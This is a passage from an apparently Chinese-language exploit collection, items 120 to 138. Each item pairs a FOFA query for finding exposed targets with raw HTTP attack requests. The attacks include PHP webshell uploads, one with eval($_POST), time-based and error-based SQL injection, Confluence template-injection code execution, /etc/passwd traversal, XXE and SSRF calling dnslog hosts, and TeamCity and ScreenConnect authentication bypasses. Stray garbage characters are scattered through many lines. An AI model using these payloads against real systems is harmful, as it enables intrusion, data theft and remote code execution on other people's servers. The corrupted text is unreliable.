5 Z2 a9 F: P7 Z) z, `4 kX-Remote-Ip: 1.1.1.1% P$ J' M( L* q
X-Remote-Addr: 1.1.1.1
- ~: R. ^* s! }3 @" _# I4 _Te: trailers2 Q. @9 L- e0 U
Connection: close3 i$ n# }" D0 W
. _" b% O# J8 M- U% P; k1 O5 P
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
2 R5 h" U! z/ [* W2 i& ?6 d4 H, A8 ]- Z/ _+ U+ x" O; ]4 b! V! A$ z
$ P( }2 i- G- p; s
120. 北京百绰智能S40管理平台导入web.php任意文件上传
I d% ]: s; m# g) H+ N$ c5 UCVE-2024-12530 |7 e) N# A9 B7 A, K, r
FOFA:title="Smart管理平台"
) u. M6 C* }: M6 sPOST /useratte/web.php? HTTP/1.1# H& s# V9 k1 G& p2 p( Y5 }# O
Host: ip:port
. v9 q5 I; G5 k" M2 fCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
6 _0 f0 _; j; h+ ]! HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko( p% N+ E$ f0 M! R c0 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 ` m2 V6 t% h3 [+ \; u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 a% V( Y( m E) ?1 K7 \Accept-Encoding: gzip, deflate
! Y5 R# n- h( U SContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328( T) G1 [- E+ i. L! N0 S
Content-Length: 597
& d u8 W& v% W0 YOrigin: https://ip:port, S% R( Q, V& }) U; l3 O1 n- x
Referer: https://ip:port/sysmanage/licence.php& L- u3 C5 X+ H# v8 d0 y3 J5 m' r( j
Upgrade-Insecure-Requests: 1
" ?; }$ w: p+ g) D! @* T& L- D; XSec-Fetch-Dest: document
" z1 T8 i" d+ s1 M& i: I! gSec-Fetch-Mode: navigate, }$ C* l9 ~1 r! b
Sec-Fetch-Site: same-origin
2 F t5 j; k$ O, o& z2 w4 N3 iSec-Fetch-User: ?1" J% s" W8 @9 B' x
Te: trailers8 _7 P! I0 n/ C1 d0 t8 j3 R$ q
Connection: close
p, O7 I4 L$ E: {# N
' T$ W s! e$ P-----------------------------42328904123665875270630079328' K8 a2 ^( }1 I. w( q
Content-Disposition: form-data; name="file_upload"; filename="2.php"
/ q% U% H) ^% p2 `* Y9 h5 zContent-Type: application/octet-stream% g' h; M0 j1 s9 @# j
2 B! K4 G& z- b( T/ x<?php phpinfo()?>
# ]. T4 B* G& X4 {2 z-----------------------------42328904123665875270630079328# h, g' \- {# {; P j9 P
Content-Disposition: form-data; name="id_type"
( t8 Y" z1 ?( w
; T- Y1 F# S4 t( M1
: O N: J' s9 o3 v' Q-----------------------------42328904123665875270630079328* J6 s# O: r" i( g
Content-Disposition: form-data; name="1_ck") Z. A6 G0 k* V" o8 N
P4 }( K4 _# ~8 O# W. ^1_radhttp
( f8 X3 J1 j5 C3 F+ \-----------------------------42328904123665875270630079328
2 @+ K7 m. W8 H d5 x7 O xContent-Disposition: form-data; name="mode"4 `# f; o' U$ S8 F; N8 H
) H% {3 l! C. i9 A1 Y' r3 i
import6 H* I- v& h9 l6 F! E& v
-----------------------------42328904123665875270630079328- O2 p( Y" k6 o4 O5 V% }4 t' m
& ]# _5 G" v2 q& w
) y u0 X% Y7 L1 r! [+ d) v( I5 @' j
文件路径/upload/2.php% P9 F- B/ y! v2 c) |
0 ^5 ^! e: f+ O# Y
121. 北京百绰智能S42管理平台userattestation.php任意文件上传1 T, P4 w$ H( ?/ e5 I
CVE-2024-1918, Q: l; p% P# u. v- L. x- U
FOFA:title="Smart管理平台": l1 i: V) x1 M5 y
POST /useratte/userattestation.php HTTP/1.1$ k5 y( c+ Y9 f* e. ]* ]
Host: 192.168.40.130:8443
2 d* |% e" s/ y- B- @Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
+ k4 r" h: ]! eUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko) m/ Y1 I& |; P0 V1 r: Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. m) h/ M2 ]+ b) S+ P) w' bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 |3 y7 e$ n6 f' W& _; j3 P+ vAccept-Encoding: gzip, deflate9 u% r. M+ F+ G9 v& X2 b" } z4 [
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 z& K0 d+ x; n
Content-Length: 592
, U1 W2 L1 n9 h6 T8 U' H+ KOrigin: https://192.168.40.130:8443
% V1 z5 i2 M6 }2 AUpgrade-Insecure-Requests: 14 Z8 A' C6 u* a9 v9 L) w y
Sec-Fetch-Dest: document4 G' i, K% v+ p8 C0 s4 c- j
Sec-Fetch-Mode: navigate3 H& C( W9 J# }5 R+ {+ i) c
Sec-Fetch-Site: same-origin& }4 P# @5 F5 k9 T: c% C
Sec-Fetch-User: ?1
5 H8 M; V5 [. }: J# }Te: trailers
5 K" t* b/ b3 I6 b3 }Connection: close+ s- T w4 z; C& g) P( X' {
+ q6 o$ G8 N9 \+ O5 \' {4 V-----------------------------423289041236658752706300793285 z6 Z7 D; ~3 ^, H3 n2 B, q1 x3 j
Content-Disposition: form-data; name="web_img"; filename="1.php"
6 A3 o( {* w5 _Content-Type: application/octet-stream
2 d, z9 W; T R7 [. x$ J
2 e4 `* s6 o+ E0 E' J% }( o<?php phpinfo();?>& U, b7 C. }- \6 {8 z* j8 ^1 \ y1 j+ I
-----------------------------42328904123665875270630079328
9 v" W* \' ]5 `; S$ dContent-Disposition: form-data; name="id_type", }& F: a6 S. a8 W8 S! D! H
8 Z. i% D( J- l* m; M7 B2 l# d1
. _3 z3 d2 M- F& E-----------------------------42328904123665875270630079328
- T4 i2 L" O3 _& k7 OContent-Disposition: form-data; name="1_ck"
* M' A2 w! b8 Z+ _6 I9 G* y) Q: @( q- M; q" @
1_radhttp
7 K, C: u. ^+ P- N-----------------------------42328904123665875270630079328; H- A2 l& I5 P! V) o
Content-Disposition: form-data; name="hidwel"& ~( U6 g$ ]% _0 N2 Z0 U- M) J
0 {2 {% i9 j6 {, a, p1 m! p' |+ D* Lset
$ i) S8 V; q% G-----------------------------42328904123665875270630079328 [: i* D: y0 [4 v8 @
4 c3 a; H. h3 { o- Z! j+ G# k5 P! M& m3 m4 g) {+ @, w
boot/web/upload/weblogo/1.php
1 k. a6 N( |' U' z
3 b, B+ T n5 z- l( t; I122. 北京百绰智能s200管理平台/importexport.php sql注入$ E( A' Y f! P2 J
CVE-2024-27718FOFA:title="Smart管理平台"! h9 K1 H& A6 D7 ]* Y
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
2 _6 J( s" C0 w/ |; c: B: C8 g* nGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1# X m4 t- z/ \: J0 i- ?) t ~
Host: x.x.x.x( z, u& |# M1 c8 u: y3 u
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
0 Q' Y+ W# `! gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 q& W* G Z' Y$ O: w, {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' B; S+ \, ?8 w. v4 v8 Q: N2 e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 f; }7 w$ k6 F( aAccept-Encoding: gzip, deflate, br8 T) `4 s- x* B
Upgrade-Insecure-Requests: 1! D: o5 G! V; O3 s e7 ^( Y
Sec-Fetch-Dest: document
9 X3 B/ `$ f5 h5 l: t( i9 q fSec-Fetch-Mode: navigate
& Z5 ?# ?2 i- @, n3 L2 LSec-Fetch-Site: none7 [( q% }+ @2 K+ { \0 F: O, |
Sec-Fetch-User: ?1
" N0 N2 m: {- u- v& h: F4 O- RTe: trailers
' n9 s- {! ` G9 sConnection: close
: n+ d# A3 \5 X' e& t/ K; M* S5 C; I" x9 P3 U5 _
) c# R$ k8 o2 x2 h' E
123. Atlassian Confluence 模板注入代码执行3 m7 U6 g `2 S. M* |$ D. c
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"3 y* F- f. i3 U+ B8 a7 C4 {
POST /template/aui/text-inline.vm HTTP/1.16 s6 _9 s6 J, w, f9 @& n0 j$ d' v
Host: localhost:8090' Q2 Q/ y0 D. r# a8 ~% ]
Accept-Encoding: gzip, deflate, br! H8 B7 ?) m* ?8 d' P; A- C* U
Accept: */*# N+ [+ o% o2 [; o$ ~5 J) L; @
Accept-Language: en-US;q=0.9,en;q=0.8
; j" t5 e9 i2 }5 ~& SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+ y4 P3 X2 g* j1 d* fConnection: close
8 Y4 M& X4 R4 ]# @( ^1 BContent-Type: application/x-www-form-urlencoded* }# N- ~8 X: H, n% v
9 e1 a5 O- v1 d K
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
; p/ G ]! q! Q, d+ K4 L3 m& j# Q3 f9 q; K
) f0 |- d2 x% N# s
124. 湖南建研工程质量检测系统任意文件上传
( W7 V- R! R. p4 C1 A9 MFOFA:body="/Content/Theme/Standard/webSite/login.css"* c6 z. v- ^+ s" m- E3 o
POST /Scripts/admintool?type=updatefile HTTP/1.1; s! J) R) i Q$ I; B
Host: 192.168.40.130:82821 K3 Y/ V/ i- k# {5 S+ B
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 [( d: P) C; u' }
Content-Length: 727 g" g* F- G2 o2 ^: M- T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8( \ z# r3 m6 d
Accept-Encoding: gzip, deflate, br
% z+ J0 Z/ g6 @: v ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 [1 x$ I# }( |) x% L5 J0 r+ o4 h& yConnection: close# `6 e; X5 E0 F) v
Content-Type: application/x-www-form-urlencoded
$ M9 {! c+ r& d
$ [+ @: \+ N/ C0 EfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
& c8 \4 N1 Y% F" ~: y! u
+ _/ O4 j1 n/ ]( Y, g w3 u) V8 g7 |, ^4 o9 O
http://192.168.40.130:8282/Scripts/abcgcg.aspx/ S0 \- S7 Z) W; t
. C0 B1 J6 `5 r* b: Y125. ConnectWise ScreenConnect身份验证绕过; Z% b7 R: y6 K4 `: L
CVE-2024-1709
! ?2 B+ L" Y, G0 A/ A& X# ]FOFA:icon_hash="-82958153"
; v6 d2 D, l# H$ b9 o8 bhttps://github.com/watchtowrlabs ... bypass-add-user-poc
5 d" p! {% H$ W. C2 O" h. g. t, L c! A6 O# U z3 f" q
# _0 X: [0 Q: y$ x0 U使用方法 x% r' h( {# L$ O. n4 V) S
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
/ c$ j( ]; v" B5 v' ]. Q* G& ]- o! R. n, x5 O, z
7 b# S) y2 I- M, z3 u x' F8 f5 G创建好用户后直接登录后台,可以执行系统命令。5 T5 _ ~& }: ~* x
# L7 p7 t4 k) |3 V8 k {( ~' T
126. Aiohttp 路径遍历
) }8 \" J0 l8 y1 m$ }FOFA:title=="ComfyUI"
6 I4 _! K$ `, d% \* t) rGET /static/../../../../../etc/passwd HTTP/1.1
5 l0 C/ ~: l f; E/ I5 g. @1 aHost: x.x.x.x1 D# u( g0 M5 Y- t7 d' m7 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.362 W" w( g; U: g9 g
Connection: close% @. Q- b" Z8 ~0 R) e y
Accept: */*
$ |; L8 ~# z: ?Accept-Language: en6 ~2 M& ?* [8 D6 G( `
Accept-Encoding: gzip% C$ @ u I0 E" l1 ^; N
2 I5 `2 T1 H8 O+ p% h
' e0 H6 U1 e) B/ N d' M2 W& `
127. 广联达Linkworks DataExchange.ashx XXE: D7 R6 w1 c% T
FOFA:body="Services/Identification/login.ashx"
1 p& P4 D% o1 b" ~) ?% CPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.14 }3 ^7 Q- e# p! ] k" {9 a
Host: 192.168.40.130:8888
( G' r9 W8 O3 ]2 | m: o5 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
) x8 m5 R% |4 C: z2 K2 mContent-Length: 415
0 M! O" W' n) V+ O" C" ^: v, EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% x, w0 n. _/ K# M, V8 v! G1 ?/ m
Accept-Encoding: gzip, deflate
0 u7 {% | d; C7 fAccept-Language: zh-CN,zh;q=0.9
( n' ~ o; v8 y% E# w( b8 ?Connection: close
: k0 [# Q! `6 g. vContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0( w, C: C9 h- b* _, k5 e
Purpose: prefetch
1 J7 F' y% C1 t) W+ e; x5 g. k* E8 Y2 d0 PSec-Purpose: prefetch;prerender* G9 m9 Z% d4 ]3 I8 H9 n+ g
5 l* d& u& I7 a/ h------WebKitFormBoundaryJGgV5l5ta05yAIe08 z+ a3 _$ K; T! R3 G; X) k' @
Content-Disposition: form-data;name="SystemName"
" n) k" e3 H- z( t, o" h: h1 R+ ?
8 m5 F/ [: r3 C2 |/ s. dBIM
! R1 }: c% H- ^------WebKitFormBoundaryJGgV5l5ta05yAIe0
, }, M8 @( N7 a" ~2 iContent-Disposition: form-data;name="Params"; i( _1 I1 D% u% @7 l( _
Content-Type: text/plain& s2 E: N8 l3 e r
# Q: J% }4 n- Z& b$ _
<?xml version="1.0" encoding="UTF-8"?>: V( w7 e% {5 r3 B/ A
<!DOCTYPE test [, L- f) r& [" W1 x3 ^
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">7 x: Z4 L3 H! z- q0 i
]& Q; |' ?- E/ ?$ U& _. x
>
8 B: O: n' O( P8 T<test>&t;</test>5 G( z' g$ f: j$ c9 R) J
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
4 w' o' ]0 ^, j9 x/ ?: b4 t1 s' a# p
Q! i; I" Z% r' l9 `/ u% w# Y9 t) |% S# x. G$ S
128. Adobe ColdFusion 反序列化
' w7 @' Z( A% K* m: T( U8 yCVE-2023-382032 K- b0 T0 P7 o' W( [' ?& w! T$ ]
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
3 k$ ?% @ A, S4 c; k: XFOFA:app="Adobe-ColdFusion"
6 j' ?" W0 ?5 s$ ~8 HPAYLOAD
% @# x8 h9 R2 y- J9 G1 o3 t2 y6 V) q$ W4 T$ m M- Q
129. Adobe ColdFusion 任意文件读取
8 R" n. s7 F" K0 s$ @ F* X+ KCVE-2024-20767
, ?. M- Z& `. H- |6 F8 GFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"# x Z4 _: I8 G) C& F+ q6 @5 b
第一步,获取uuid
/ `4 s9 G* P2 r; [, l' SGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
, u- D5 N. i9 k4 z4 {Host: x.x.x.x8 z9 h- u& ?3 l4 `! ~1 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* v3 x* S, \1 T. A( S; }. o% x$ X
Accept: */*( T6 H5 u" C7 i
Accept-Encoding: gzip, deflate$ W! {; [3 @5 m$ Y( f# S& \& t4 ^
Connection: close
5 o6 d! F- }0 r* E% r- G$ u8 ^) k$ c: m
4 _$ w5 r* m; Z7 D L6 s5 [
第二步,读取/etc/passwd文件
5 F' f( c) \' k: x8 P0 ~GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
' D8 v2 W; l# j" s7 U" r: bHost: x.x.x.x" B" A" H4 k& t* B4 [& F0 f/ P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 K8 _- N* a# u5 L0 O5 S8 O6 YAccept: */*; F+ {7 I: F1 s- l7 J1 E3 ?/ R
Accept-Encoding: gzip, deflate! S+ ? s. ?2 e
Connection: close& M% m' E1 a% ]1 U
uuid: 85f60018-a654-4410-a783-f81cbd5000b9( {) w4 H' ]* Z" q( R6 I; l
r: J2 l3 g! n
: \% |. n! Z! W3 }5 I# p: a; c130. Laykefu客服系统任意文件上传
" M6 C" |" Y+ W/ z; f8 pFOFA:icon_hash="-334624619"
! Q9 `7 H) Y" M, F6 EPOST /admin/users/upavatar.html HTTP/1.1+ A7 ]8 t! P6 ? {) D
Host: 127.0.0.1+ P0 n. q. L& P( J' _' _
Accept: application/json, text/javascript, */*; q=0.018 d8 G& e$ @% c
X-Requested-With: XMLHttpRequest3 d# a( r W' i
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26( A- J) j; {4 t E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR/ D5 k0 \0 \% Y( E+ }" ?
Accept-Encoding: gzip, deflate* q; k0 R/ O2 X" P9 G$ H, d- Z
Accept-Language: zh-CN,zh;q=0.9& M$ K3 k5 P2 U
Cookie: user_name=1; user_id=3! G) h/ }8 J" x9 {/ Q# y
Connection: close& c* b5 J* V/ [3 {8 F6 ^. K
$ D: j. ^9 r9 |/ r------WebKitFormBoundary3OCVBiwBVsNuB2kR
2 O8 a. c! x# QContent-Disposition: form-data; name="file"; filename="1.php"( l' T+ X0 c/ i$ Y
Content-Type: image/png
' s+ `$ r9 A- S. M
4 s; A. L6 D3 R, `& ?<?php phpinfo();@eval($_POST['sec']);?>
; c# y, Y6 e4 b/ k7 F) N3 v" K------WebKitFormBoundary3OCVBiwBVsNuB2kR--
* ^# @ A1 o" y6 T) j u/ y
" T1 P4 i% K* w/ ?# w% p" H5 O8 k
131. Mini-Tmall <=20231017 SQL注入
3 I8 k$ }4 u6 Q- O. i' PFOFA:icon_hash="-2087517259"
2 B& Y* C3 {1 k! k) X/ m% m1 `- @后台地址:http://localhost:8080/tmall/admin
9 _+ d/ z& R' H W r" v# y* xhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
+ ?0 `+ ~ F8 b4 Z1 I& b/ x0 W" \, J8 C4 ~
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过# ^$ L, u# R' F. |6 \% s6 }
CVE-2024-27198
- ~7 W/ P. }* I: z; E6 t% e3 |; \FOFA:body="Log in to TeamCity"
/ Z3 Y1 _3 o% X! oPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
6 ~+ k* b/ A4 `( w1 M" G* N/ s$ |Host: 192.168.40.130:81112 T ?& N6 Q2 [ D- O/ y/ a; r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% ^% M) b9 ~1 x; S* v* Z
Accept: */*- q X& I1 m2 U2 X3 [; G
Content-Type: application/json
3 ^0 S% I' a# A8 L' Z- ~! |$ |Accept-Encoding: gzip, deflate
7 G8 Y/ ^8 D5 X
2 F6 J$ I7 [' a6 l{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
X: H6 s* I: G; G6 x
) ]: C. Q: \0 S7 R y, K- ^; t; j9 I! W& o
CVE-2024-271998 U. y; n: f3 I- r* y# |
/res/../admin/diagnostic.jsp
7 d3 D# e; B5 @! s/.well-known/acme-challenge/../../admin/diagnostic.jsp
/ \3 J; U- s! s( e8 Y& X$ }7 h/update/../admin/diagnostic.jsp
6 n$ o$ q5 z. Z9 w- R; Q9 R- `# Q; t& _1 U9 x% `2 |
; p+ M& z0 @8 e- q
CVE-2024-27198-RCE.py$ W7 r/ Z3 N* ]5 d/ o( {; U$ t
1 C# K+ y! e8 x& j9 m1 S
133. H5 云商城 file.php 文件上传
! ]9 }* f* _; P2 Q) h2 u* \. t& CFOFA:body="/public/qbsp.php"2 D# q1 W+ U [5 v
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1' a$ s6 a6 c$ U$ k
Host: your-ip
* l8 _' _' x; H. y/ ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; \- L! |4 b2 r, o! T$ U2 ^% G( s G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
9 d( a' ~7 b, c% }
4 y& f$ x. ]& ~' Y a------WebKitFormBoundaryFQqYtrIWb8iBxUCx* e" Y0 P. I$ }: m: B
Content-Disposition: form-data; name="file"; filename="rce.php"
. V7 Y8 M9 ]7 AContent-Type: application/octet-stream
& Y% S" a* s% b! _/ k# M
7 j% i* ] P) g0 f _* E/ Q<?php system("cat /etc/passwd");unlink(__FILE__);?>
. ~& L" Z0 v, `3 m------WebKitFormBoundaryFQqYtrIWb8iBxUCx--& w. B3 P2 l0 e7 m$ k2 Z) K/ u+ Y" }
" H$ N& V; o y' T2 s# C, h
9 F! |& `: m7 r$ v5 b0 K3 @1 L+ F6 _4 \4 v9 |# b g7 ^ A
134. 网康NS-ASG应用安全网关index.php sql注入! ] z9 V* q3 q7 ]2 `: `
CVE-2024-23300 J5 S5 B; x# {# }
Netentsec NS-ASG Application Security Gateway 6.3版本! |# G8 [9 W2 j! L) \
FOFA:app="网康科技-NS-ASG安全网关"
( A- a8 {7 \# x* F+ C: W$ f; jPOST /protocol/index.php HTTP/1.1# |: o4 v* v! s- [; q
Host: x.x.x.x
3 `5 u7 `/ N5 z" `! kCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
! k) L' G; ]9 A8 I# b$ W0 J' MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
& a; M- Q& |7 E. hAccept: */*; S! j$ L6 P0 x$ g9 m5 l, |# A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ D0 L) ~0 e: E! ^% I; B0 s
Accept-Encoding: gzip, deflate
. u( _* _( p$ ^Sec-Fetch-Dest: empty
% r9 l7 c% d" k- d5 h$ n7 P! x* WSec-Fetch-Mode: cors
6 o6 Y$ T o+ R& U2 k" I) w9 RSec-Fetch-Site: same-origin
0 O4 g, x# v7 D# j8 M) o! X% nTe: trailers
3 w) {5 ?$ D7 E: \' F- vConnection: close0 Z/ z7 C! q7 O: E) p: E7 [
Content-Type: application/x-www-form-urlencoded9 U7 A& G3 _) ]+ R
Content-Length: 263
# \) f& u8 o; a# |/ j1 x4 p! L
( j. C+ l! o& ^# U( w2 Sjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}$ \, L; h6 d! H. A# }' d
* c+ ]( D1 L( |: A1 h5 I+ E% u; F. C5 r p# k
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( N- S; B1 c1 b+ G) c
CVE-2024-2022& Q& M- i2 A0 `# D3 r9 v
Netentsec NS-ASG Application Security Gateway 6.3版本
5 p/ x3 K1 }# h2 I) Z9 g# Y" U2 ?% aFOFA:app="网康科技-NS-ASG安全网关"$ n9 B$ A# Q' @) ~3 d
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1& v4 p4 S+ ^8 \) D5 M- r& a
Host: x.x.x.x" W! K. d' C* ^6 L/ Y0 @- q$ U* t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 N" F( Y" G0 Q# q- m- Y: s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% p1 A# t6 Y* Y/ _2 ~Accept-Encoding: gzip, deflate$ U% X. X, ^+ Z( I, f' A, B
Accept-Language: zh-CN,zh;q=0.9
$ n: r9 r/ ]7 O8 n) T7 QConnection: close) L8 Q1 j/ P) m- H
1 \8 \1 ]7 e+ q; H5 o! A4 L3 P" d8 B7 N: U' n# B. c, f% f
136. NextChat cors SSRF
& D* ^: n' P( k5 Q2 `1 h8 eCVE-2023-49785. B; Y& j$ ~$ {, k2 i
FOFA:title="NextChat"( F7 v) K/ ]5 _0 i) @+ _8 W, h
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1- W% _( t! F0 G3 e' j. K. v
Host: x.x.x.x:10000% W4 u3 T% x( `' o4 z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 T4 L: b! Y. g% ]! s! x$ XConnection: close: [3 j( F1 l9 s5 M. \
Accept: */*7 I! }+ e7 d6 E5 X1 ]
Accept-Language: en
# t, k5 ~6 a+ y' g. t( Y1 S* WAccept-Encoding: gzip/ W- r9 \( l- K2 _8 M2 \
$ t0 p. _. [9 W/ o3 l. k9 K8 N* x( ^3 z
137. 福建科立迅通信指挥调度平台down_file.php sql注入+ G0 m' X% E r7 B* }) R
CVE-2024-2620
2 ]% o( K6 E8 Y8 T; u; w; nFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 O& W N/ D: V' q ^
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.10 _+ K' r# n8 k9 J
Host: x.x.x.x
( _* }9 h7 b& q6 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ L4 ?3 I7 {4 m8 m; P! n; v/ zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 b) y0 c( ~* p. \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; _2 m9 ^2 h. G1 \
Accept-Encoding: gzip, deflate, br
0 L5 ?7 x6 z/ I% r* O3 Z; RConnection: close7 u) Y0 ^' J5 Y% G$ \* |0 ?
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
/ ^- {; A% C X- J4 ~$ h n& O8 E% g1 xUpgrade-Insecure-Requests: 1
0 t: A. i; n: C+ I5 N, {
/ |% b# B; q! y# U1 ~
8 \- T5 F7 O1 M0 P2 E( L138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
9 d2 O/ X0 _! w8 F0 N$ XCVE-2024-2621! L* w7 |: b1 c6 ]" N
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"- d# t S6 p) J9 r
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
* j S& m- B! I2 U) jHost: x.x.x.x, l& |$ F: B" N4 j1 m5 w& B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 w7 o5 A, ]7 \+ L6 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" [8 w( Z# {% |' j4 ~5 O: tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 M, J- L) Z1 ]# ^; VAccept-Encoding: gzip, deflate, br% [: B( @: q1 T0 p
Connection: close, z5 @, m2 X5 R- z# ^' B* k
Upgrade-Insecure-Requests: 17 P$ _, e0 R% N# t& t7 I
) {0 V+ g) r" P6 q
4 ^+ n7 v: a4 D; J& a( Y
